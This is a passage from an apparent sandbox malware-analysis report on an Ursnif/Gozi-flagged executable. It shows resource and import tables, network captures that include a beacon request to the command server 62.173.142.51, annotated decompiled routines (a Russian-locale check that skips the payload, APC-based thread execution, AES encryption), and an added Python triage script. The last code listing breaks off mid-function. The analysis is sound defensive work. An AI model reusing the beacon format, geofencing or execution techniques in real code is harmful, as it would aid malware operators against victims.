    RT_ICON | 0xb2958 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Norway
    RT_ICON | 0xb2958 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Sweden
    RT_ICON | 0xb4f00 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Finland
    RT_ICON | 0xb4f00 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Norway
    RT_ICON | 0xb4f00 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Sweden
    RT_ICON | 0xb5fa8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Sami Lappish | Finland
    RT_ICON | 0xb5fa8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Sami Lappish | Norway
    RT_ICON | 0xb5fa8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Sami Lappish | Sweden
    RT_ICON | 0xb6930 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Sami Lappish | Finland
    RT_ICON | 0xb6930 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Sami Lappish | Norway
    RT_ICON | 0xb6930 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Sami Lappish | Sweden
    RT_STRING | 0xb85d8 | 0x3be | data | Sami Lappish | Finland
    RT_STRING | 0xb85d8 | 0x3be | data | Sami Lappish | Norway
    RT_STRING | 0xb85d8 | 0x3be | data | Sami Lappish | Sweden
    RT_STRING | 0xb8998 | 0x36a | data | Sami Lappish | Finland
    RT_STRING | 0xb8998 | 0x36a | data | Sami Lappish | Norway
    RT_STRING | 0xb8998 | 0x36a | data | Sami Lappish | Sweden
    RT_ACCELERATOR | 0xb6ea8 | 0x90 | data | Sami Lappish | Finland
          RT_ACCELERATOR0xb6ea80x90dataSami LappishNorway
          RT_ACCELERATOR0xb6ea80x90dataSami LappishSweden
          RT_ACCELERATOR0xb6e000xa8dataSami LappishFinland
          RT_ACCELERATOR0xb6e000xa8dataSami LappishNorway
          RT_ACCELERATOR0xb6e000xa8dataSami LappishSweden
          RT_GROUP_CURSOR0xb70780x14data
          RT_GROUP_CURSOR0xb83580x30data
          RT_GROUP_ICON0xb0e500x30dataSami LappishFinland
          RT_GROUP_ICON0xb0e500x30dataSami LappishNorway
          RT_GROUP_ICON0xb0e500x30dataSami LappishSweden
          RT_GROUP_ICON0xacf300x22dataSami LappishFinland
          RT_GROUP_ICON0xacf300x22dataSami LappishNorway
          RT_GROUP_ICON0xacf300x22dataSami LappishSweden
          RT_GROUP_ICON0xb6d980x68dataSami LappishFinland
          RT_GROUP_ICON0xb6d980x68dataSami LappishNorway
          RT_GROUP_ICON0xb6d980x68dataSami LappishSweden
          RT_VERSION0xb83880x24cdata
          None0xb6f380xadataSami LappishFinland
          None0xb6f380xadataSami LappishNorway
          None0xb6f380xadataSami LappishSweden
          DLL | Import
          KERNEL32.dll | PulseEvent, ReadConsoleInputW, GetFirmwareEnvironmentVariableW, GetCPInfoExW, CreateEventW, CopyFileExA, GetProcAddress, GlobalAlloc, SetDefaultCommConfigA, OpenWaitableTimerW, GetFileAttributesW, EnumResourceTypesW, WriteFileGather, GetModuleHandleW, InterlockedCompareExchange, UnhandledExceptionFilter, LocalFlags, GlobalLock, GetConsoleAliasW, WritePrivateProfileSectionA, FindFirstVolumeMountPointA, SetLastError, SleepEx, AddAtomA, lstrcmpA, SetCalendarInfoA, GetSystemWindowsDirectoryA, EnumTimeFormatsW, GetSystemDirectoryW, AddAtomW, GetExitCodeThread, _llseek, FindNextFileW, CopyFileA, GetShortPathNameW, EnumCalendarInfoA, EnumCalendarInfoExA, AddRefActCtx, SetStdHandle, WriteConsoleW, GetCurrentThreadId, LoadLibraryA, CloseHandle, SetFilePointer, ReadFile, FlushFileBuffers, InterlockedIncrement, InterlockedDecrement, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, EncodePointer, DecodePointer, GetLastError, HeapFree, RtlUnwind, RaiseException, HeapReAlloc, HeapAlloc, MoveFileA, DeleteFileA, GetCommandLineA, HeapSetInformation, GetStartupInfoW, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, HeapCreate, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameW, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW, GetLocaleInfoW, HeapSize, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, LoadLibraryW, GetConsoleCP, GetConsoleMode, CreateFileW
          USER32.dll | LoadMenuW
          ADVAPI32.dll | LookupAccountSidW
          SHELL32.dll | FindExecutableA
          ole32.dll | CoGetInstanceFromFile
          Language of compilation system | Country where language is spoken
          Sami Lappish | Finland
          Sami Lappish | Norway
          Sami Lappish | Sweden
          Timestamp | Source Port | Dest Port | Source IP | Dest IP
          Mar 14, 2023 08:25:50.375926018 CET | 49701 | 80 | 192.168.2.3 | 62.173.142.51
          Mar 14, 2023 08:25:50.436150074 CET | 80 | 49701 | 62.173.142.51 | 192.168.2.3
          Mar 14, 2023 08:25:50.436259031 CET | 49701 | 80 | 192.168.2.3 | 62.173.142.51
          Mar 14, 2023 08:25:50.436628103 CET | 49701 | 80 | 192.168.2.3 | 62.173.142.51
          Mar 14, 2023 08:25:50.495964050 CET | 80 | 49701 | 62.173.142.51 | 192.168.2.3
          Mar 14, 2023 08:25:50.496022940 CET | 80 | 49701 | 62.173.142.51 | 192.168.2.3
          Mar 14, 2023 08:25:50.496108055 CET | 49701 | 80 | 192.168.2.3 | 62.173.142.51
          Mar 14, 2023 08:25:50.498536110 CET | 49701 | 80 | 192.168.2.3 | 62.173.142.51
          Mar 14, 2023 08:25:50.557815075 CET | 80 | 49701 | 62.173.142.51 | 192.168.2.3
          Timestamp | Source Port | Dest Port | Source IP | Dest IP
          Mar 14, 2023 08:24:30.206993103 CET | 62704 | 53 | 192.168.2.3 | 8.8.8.8
          Mar 14, 2023 08:24:30.228854895 CET | 53 | 62704 | 8.8.8.8 | 192.168.2.3
          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
          Mar 14, 2023 08:24:30.206993103 CET | 192.168.2.3 | 8.8.8.8 | 0x2dc2 | Standard query (0) | checklist.skype.com | A (IP address) | IN (0x0001) | false
          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
          Mar 14, 2023 08:23:52.986346006 CET | 8.8.8.8 | 192.168.2.3 | 0x15a2 | No error (0) | windowsupdatebg.s.llnwi.net | | 95.140.230.192 | A (IP address) | IN (0x0001) | false
          Mar 14, 2023 08:24:30.228854895 CET | 8.8.8.8 | 192.168.2.3 | 0x2dc2 | Name error (3) | checklist.skype.com | none | none | A (IP address) | IN (0x0001) | false
          • 62.173.142.51
          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
          0 | 192.168.2.3 | 49701 | 62.173.142.51 | 80 | C:\Users\user\Desktop\server.exe
          Timestamp | kBytes transferred | Direction | Data
          Mar 14, 2023 08:25:50.436628103 CET | 248 | OUT | GET /drew/9JLLLQ08ZT/3nAR5UipYIcJ6YCNU/DQSgo3cwsXXD/wvZ5vmAsFoS/eN07eLMp7RXTwB/STvLb_2BVZ4b1fMQvftqC/DrhbQbfPiZSBlmnh/Q60mymncnsD1BSl/lgW04WzkBwMabSScvE/3MDL0Eyu0/chVZbMtmkjfLI4ISTEnD/sLlQp4wto2w2tJ4sMhW/deWpiBQ03TPTGzGU4_2FTK/eoq2qHiaYlnL2/Y44FiYqv/mKJo7GKlTdrY4JvUjnEzoh2/JtdyUM2ECt/vn.jlk HTTP/1.1
          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
          Host: 62.173.142.51
          Connection: Keep-Alive
          Cache-Control: no-cache
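The single request above already carries several triage signals on its own: a User-Agent that claims Internet Explorer 8 on Windows NT 10.0 (Windows 10 only ever shipped IE11), a Host header that is a bare IP literal, and a long path of base64-looking segments in which two segments contain `_2B` and `_2F`, the substitutions ISFB-family samples use for the base64 characters `+` and `/` when they put encrypted data into a URL. The script below is an added example written for this page, not part of the Joe Sandbox report and not code from the sample; it parses the captured request (copied from the report) next to a constructed benign request and reports which of those three heuristics fire. The segment-count and segment-length thresholds are arbitrary choices for the example, not values from any published signature.

```python
"""Triage heuristics for a captured HTTP request (added example, not from the report).

parse_request() splits a raw HTTP/1.x request; triage() returns the names of the
checks that fire. Thresholds in suspicious_path() are arbitrary choices for this
example, not values taken from any published signature.
"""
import re
from urllib.parse import urlsplit

# Request captured by the sandbox (copied from the report above).
SAMPLE_REQUEST = (
    "GET /drew/9JLLLQ08ZT/3nAR5UipYIcJ6YCNU/DQSgo3cwsXXD/wvZ5vmAsFoS/eN07eLMp7RXTwB/"
    "STvLb_2BVZ4b1fMQvftqC/DrhbQbfPiZSBlmnh/Q60mymncnsD1BSl/lgW04WzkBwMabSScvE/"
    "3MDL0Eyu0/chVZbMtmkjfLI4ISTEnD/sLlQp4wto2w2tJ4sMhW/deWpiBQ03TPTGzGU4_2FTK/"
    "eoq2qHiaYlnL2/Y44FiYqv/mKJo7GKlTdrY4JvUjnEzoh2/JtdyUM2ECt/vn.jlk HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)\r\n"
    "Host: 62.173.142.51\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)

# Constructed benign request for comparison (not from the report).
BENIGN_REQUEST = (
    "GET /static/js/app.min.js?v=3 HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\r\n"
    "\r\n"
)

MSIE_NT = re.compile(r"MSIE (\d+)\.\d+; Windows NT (\d+)\.\d+")
IPV4_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")
# base64 alphabet with '+' and '/' written as _2B / _2F (ISFB-style URL encoding)
ESCAPED_B64 = re.compile(r"^(?:[A-Za-z0-9]|_2[BF])+$")


def parse_request(raw):
    """Return (method, target, headers) for a raw HTTP/1.x request; header names lower-cased."""
    lines = raw.strip().splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def suspicious_path(target, min_segments=8, min_len=8):
    """Many long base64-looking segments with at least one _2B/_2F escape among them."""
    segments = [s for s in urlsplit(target).path.split("/") if s]
    if len(segments) < min_segments:
        return False
    escaped = sum(1 for s in segments if "_2B" in s or "_2F" in s)
    b64_like = sum(1 for s in segments if len(s) >= min_len and ESCAPED_B64.match(s))
    return escaped >= 1 and b64_like * 2 >= len(segments)


def triage(raw):
    """Names of the heuristics the request trips, in a fixed order."""
    _method, target, headers = parse_request(raw)
    findings = []
    m = MSIE_NT.search(headers.get("user-agent", ""))
    # Windows 10 (NT 10.0) only ever shipped Internet Explorer 11.
    if m and int(m.group(1)) < 11 and int(m.group(2)) >= 10:
        findings.append("ua_os_mismatch")
    if IPV4_HOST.match(headers.get("host", "")):
        findings.append("ip_literal_host")
    if suspicious_path(target):
        findings.append("gozi_style_path")
    return findings


if __name__ == "__main__":
    for name, req in (("sample", SAMPLE_REQUEST), ("benign", BENIGN_REQUEST)):
        print(name, triage(req))
```

None of the three checks is a signature on its own (plenty of legitimate traffic goes to IP literals, and the path heuristic will also match some CDN URLs), but a request that trips all three from a freshly executed user-mode binary is worth pulling the process for.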
          Target ID:0
          Start time:08:23:58
          Start date:14/03/2023
          Path:C:\Users\user\Desktop\server.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\Desktop\server.exe
          Imagebase:0x400000
          File size:239104 bytes
          MD5 hash:BFE5C79A11EF437D401FE8A27EA49372
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.509856527.0000000000850000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          Reputation:low

            Control-flow Graph

            C-Code - Quality: 85%
            // Routine at 0x4019F1 in server.exe. It (1) derives a delay factor from
            // per-processor performance counters, (2) returns early when the user's
            // ISO 3166 country code is "RU", and (3) runs E0040139F on a fresh thread
            // by queueing it as a user APC to a thread parked inside SleepEx.
            E004019F1() {
            	long _v8;
            	char _v12;
            	char _v16;
            	void* _v40;
            	long _t28;
            	long _t30;
            	long _t31;
            	signed short _t33;
            	void* _t37;
            	long _t40;
            	long _t41;
            	void* _t48;
            	intOrPtr _t50;
            	signed int _t57;
            	signed int _t58;
            	long _t63;
            	long _t65;
            	intOrPtr _t66;
            	void* _t71;
            	void* _t75;
            	signed int _t77;
            	signed int _t78;
            	void* _t82;
            	intOrPtr* _t83;
            
            	_t28 = E00401D68();          // set-up subcall: CreateEventA, GetVersion, OpenProcess (see APIs below)
            	_v8 = _t28;
            	if(_t28 != 0) {
            		return _t28;
            	}
            	do {
            		_t77 = 0;
            		_v12 = 0;
            		_t63 = 0x30;                 // one SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION entry (48 bytes)
            		do {
            			_t71 = E004012E6(_t63);  // RtlAllocateHeap wrapper
            			if(_t71 == 0) {
            				_v8 = 8;             // ERROR_NOT_ENOUGH_MEMORY
            			} else {
            				// class 8 = SystemProcessorPerformanceInformation
            				_t57 = NtQuerySystemInformation(8, _t71, _t63,  &_v12); // executed
            				_t67 = _t57;
            				_t58 = _t57 & 0x0000ffff;
            				_v8 = _t58;
            				if(_t58 == 4) {      // low word of STATUS_INFO_LENGTH_MISMATCH (0xC0000004): add one entry and retry
            					_t63 = _t63 + 0x30;
            				}
            				_t78 = 0x13;
            				_t10 = _t67 + 1; // 0x1
            				_t77 =  *_t71 % _t78 + _t10;   // first counter (IdleTime, low dword) % 19 + 1 -> factor in 1..19
            				E00401BA9(_t71);     // releases the buffer obtained from E004012E6
            			}
            		} while (_v8 != 0);
            		_t30 = E00401688(_t77); // executed
            		_v8 = _t30;
            		Sleep(_t77 << 4); // executed  (16..304 ms, scaled by the counter-derived factor)
            		_t31 = _v8;
            	} while (_t31 == 0x15);      // 0x15 reads as ERROR_NOT_READY (21): repeat the whole step
            	if(_t31 != 0) {
            		L30:
            		return _t31;
            	}
            	// Country check: GetLocaleInfoA(LOCALE_USER_DEFAULT = 0x400, LOCALE_SISO3166CTRYNAME = 0x5a)
            	// writes the two-letter ISO 3166 country code (e.g. "RU\0") into _v12.
            	_v12 = 0;
            	_t33 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4); // executed
            	if(_t33 == 0) {
            		// fallback: derive a name from the system default UI language
            		__imp__GetSystemDefaultUILanguage();
            		_t67 =  &_v12;
            		VerLanguageNameA(_t33 & 0xffff,  &_v12, 4);
            	}
            	// 0x5552 is the string "RU" read as a little-endian word ('R' = 0x52, 'U' = 0x55):
            	// on a Russian locale the payload is never started and the function returns.
            	if(_v12 == 0x5552) {
            		L28:
            		_t31 = _v8;
            		if(_t31 == 0xffffffff) {
            			_t31 = GetLastError();
            		}
            		goto L30;
            	} else {
            		// E00401800 fills _v16 with a wide-character path; where it comes from is outside this listing
            		if(E00401800(_t67,  &_v16) != 0) {
            			 *0x404178 = 0;
            			L20:
            			// The new thread's start routine is SleepEx itself, with *0x404180 as its
            			// dwMilliseconds argument (bAlertable is not passed explicitly). Queueing
            			// an APC to that thread runs E0040139F in it once SleepEx enters its wait.
            			_t37 = CreateThread(0, 0, __imp__SleepEx,  *0x404180, 0, 0); // executed
            			_t82 = _t37;
            			if(_t82 == 0) {
            				L27:
            				_v8 = GetLastError();
            				goto L28;
            			}
            			_t40 = QueueUserAPC(E0040139F, _t82,  &_v40); // executed
            			if(_t40 == 0) {
            				// APC could not be queued: kill the parked thread and keep the error code
            				_t65 = GetLastError();
            				TerminateThread(_t82, _t65);
            				CloseHandle(_t82);
            				_t82 = 0;
            				SetLastError(_t65);
            			}
            			if(_t82 == 0) {
            				goto L27;
            			} else {
            				// wait for the APC thread to finish and return its exit code as this function's result
            				_t41 = WaitForSingleObject(_t82, 0xffffffff);
            				_v8 = _t41;
            				if(_t41 == 0) {
            					GetExitCodeThread(_t82,  &_v8);
            				}
            				CloseHandle(_t82);
            				goto L28;
            			}
            		}
            		// Normalise the path with GetLongPathNameW: the first call sizes it, the second
            		// fills a fresh buffer; the result (or the original string) lands in the global at 0x404178.
            		_t66 = _v16;
            		_t83 = __imp__GetLongPathNameW;
            		_t48 =  *_t83(_t66, 0, 0); // executed
            		_t75 = _t48;
            		if(_t75 == 0) {
            			L18:
            			 *0x404178 = _t66;
            			goto L20;
            		}
            		_t22 = _t75 + 2; // 0x2
            		_t50 = E004012E6(_t75 + _t22);   // (length + 1) * 2 bytes for the wide string
            		 *0x404178 = _t50;
            		if(_t50 == 0) {
            			goto L18;
            		}
            		 *_t83(_t66, _t50, _t75); // executed
            		E00401BA9(_t66);
            		goto L20;
            	}
            }

            APIs
              • Part of subcall function 00401D68: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
              • Part of subcall function 00401D68: GetVersion.KERNEL32 ref: 00401D86
              • Part of subcall function 00401D68: GetCurrentProcessId.KERNEL32 ref: 00401DA2
              • Part of subcall function 00401D68: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
              • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
            • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00401A26
            • Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A6D
            • GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
            • GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
            • VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
            • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401ADF
            • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401AFD
            • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 00401B27
            • QueueUserAPC.KERNELBASE(0040139F,00000000,?,?,00000000), ref: 00401B3D
            • GetLastError.KERNEL32(?,00000000), ref: 00401B4D
            • TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B57
            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B5E
            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00401B63
            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401B70
            • GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B82
            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B89
            • GetLastError.KERNEL32(?,00000000), ref: 00401B8D
            • GetLastError.KERNEL32(?,00000000), ref: 00401B9E
            Memory Dump Source
            • Source File: 00000000.00000002.509472273.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.509472273.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.509472273.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.509472273.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: ErrorLast$NameThread$CloseCreateHandleLanguageLongPathProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
            • String ID:
            • API String ID: 3475612337-0
            • Opcode ID: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
            • Instruction ID: e4abbca9115d716754b6864e37b0832fe911a2439c52af45cdd796d0275508de
            • Opcode Fuzzy Hash: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
            • Instruction Fuzzy Hash: 4E519E71901214ABE721AFA59D48EAFBA7CAB45755F104177F901F32A0EB389A40CB68
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph (rendered in the report; not reproduced in this extract). Basic blocks 0x7e1508-0x7e16af; calls on the graph: CryptAcquireContextW, memcpy, CryptImportKey, CryptSetKeyParam, CryptEncrypt, GetLastError, CryptDestroyKey, CryptReleaseContext, plus subroutines 0x7e33dc and 0x7e61da.
            C-Code - Quality: 50%
            // E007E1508: AES-128-CBC encrypt/decrypt through Microsoft CryptoAPI.
            //   __eax = input length, _a4 = non-zero to encrypt / zero to decrypt,
            //   _a8  = pointer to the 16-byte key (the decompiler reuses this slot for the
            //          return error code), _a12 = input, _a16/_a20 receive the output
            //          buffer and its length.
            E007E1508(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
            	int _v8;
            	long* _v12;
            	int _v16;
            	void* _v20;
            	long* _v24;
            	void* _v39;
            	char _v40;
            	void _v56;
            	int _v60;
            	intOrPtr _v64;
            	void _v67;
            	char _v68;
            	void* _t61;
            	int _t68;
            	signed int _t76;
            	int _t79;
            	int _t81;
            	void* _t85;
            	long _t86;
            	int _t90;
            	signed int _t94;
            	int _t101;
            	void* _t102;
            	int _t103;
            	void* _t104;
            	void* _t105;
            	void* _t106;
            
            	_t103 = __eax;                 // bytes of input still to process
            	_t94 = 6;
            	_v68 = 0;
            	memset( &_v67, 0, _t94 << 2);  // zero the 28-byte key blob at _v68 ...
            	_t105 = _t104 + 0xc;
            	asm("stosw");
            	asm("stosb");
            	_v40 = 0;
            	asm("stosd");                  // ... and the 16-byte IV at _v40
            	asm("stosd");
            	asm("stosd");
            	asm("stosw");
            	asm("stosb");
            	// CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES (0x18), CRYPT_VERIFYCONTEXT (0xF0000000))
            	_t61 =  *0x7ea0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
            	if(_t61 == 0) {
            		_a8 = GetLastError();
            	} else {
            		// Build a PLAINTEXTKEYBLOB on the stack:
            		//   bType = 8 (PLAINTEXTKEYBLOB), bVersion = 2 (CUR_BLOB_VERSION), reserved = 0,
            		//   aiKeyAlg = 0x660e (CALG_AES_128), cbKeySize = 0x10, then the 16 key bytes
            		//   copied from _a8. 12 + 16 = 0x1c bytes, the length passed to CryptImportKey.
            		_t101 = 0x10;
            		memcpy( &_v56, _a8, _t101);
            		_t106 = _t105 + 0xc;
            		_v60 = _t101;
            		_v67 = 2;
            		_v64 = 0x660e;
            		_v68 = 8;
            		_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
            		if(_t68 == 0) {
            			_a8 = GetLastError();
            		} else {
            			// CryptSetKeyParam(hKey, KP_IV (1), &_v40, 0): all-zero IV. The mode is
            			// left at the CryptoAPI default for block ciphers, CRYPT_MODE_CBC.
            			_push(0);
            			_push( &_v40);
            			_push(1);
            			_push(_v12);
            			if( *0x7ea0e4() == 0) {
            				_a8 = GetLastError();
            			} else {
            				// Output size: round the input up to 16 bytes; when encrypting an exact
            				// multiple, add one more block so the PKCS#7 padding block fits.
            				_t18 = _t103 + 0xf; // 0x10
            				_t76 = _t18 & 0xfffffff0;
            				if(_a4 != 0 && _t76 == _t103) {
            					_t76 = _t76 + _t101;
            				}
            				_t102 = E007E33DC(_t76);   // allocate the output buffer
            				_v20 = _t102;
            				if(_t102 == 0) {
            					_a8 = 8;               // ERROR_NOT_ENOUGH_MEMORY
            				} else {
            					_v16 = 0;              // bytes produced so far
            					_a8 = 0;
            					while(1) {
            						// one 16-byte block per call (the last block may be shorter)
            						_t79 = 0x10;
            						_v8 = _t79;
            						if(_t103 <= _t79) {
            							_v8 = _t103;
            						}
            						memcpy(_t102, _a12, _v8);
            						_t81 = _v8;
            						_a12 = _a12 + _t81;
            						_t103 = _t103 - _t81;
            						_t106 = _t106 + 0xc;
            						// Final = (no input left). The seven-argument call at 0x7ea0c0 is the
            						// CryptEncrypt reference at 007E1615 in the APIs list (dwBufLen = 0x20);
            						// the six-argument call at 0x7ea0a8 is not resolved in the listing, but
            						// its arity matches CryptDecrypt.
            						if(_a4 == 0) {
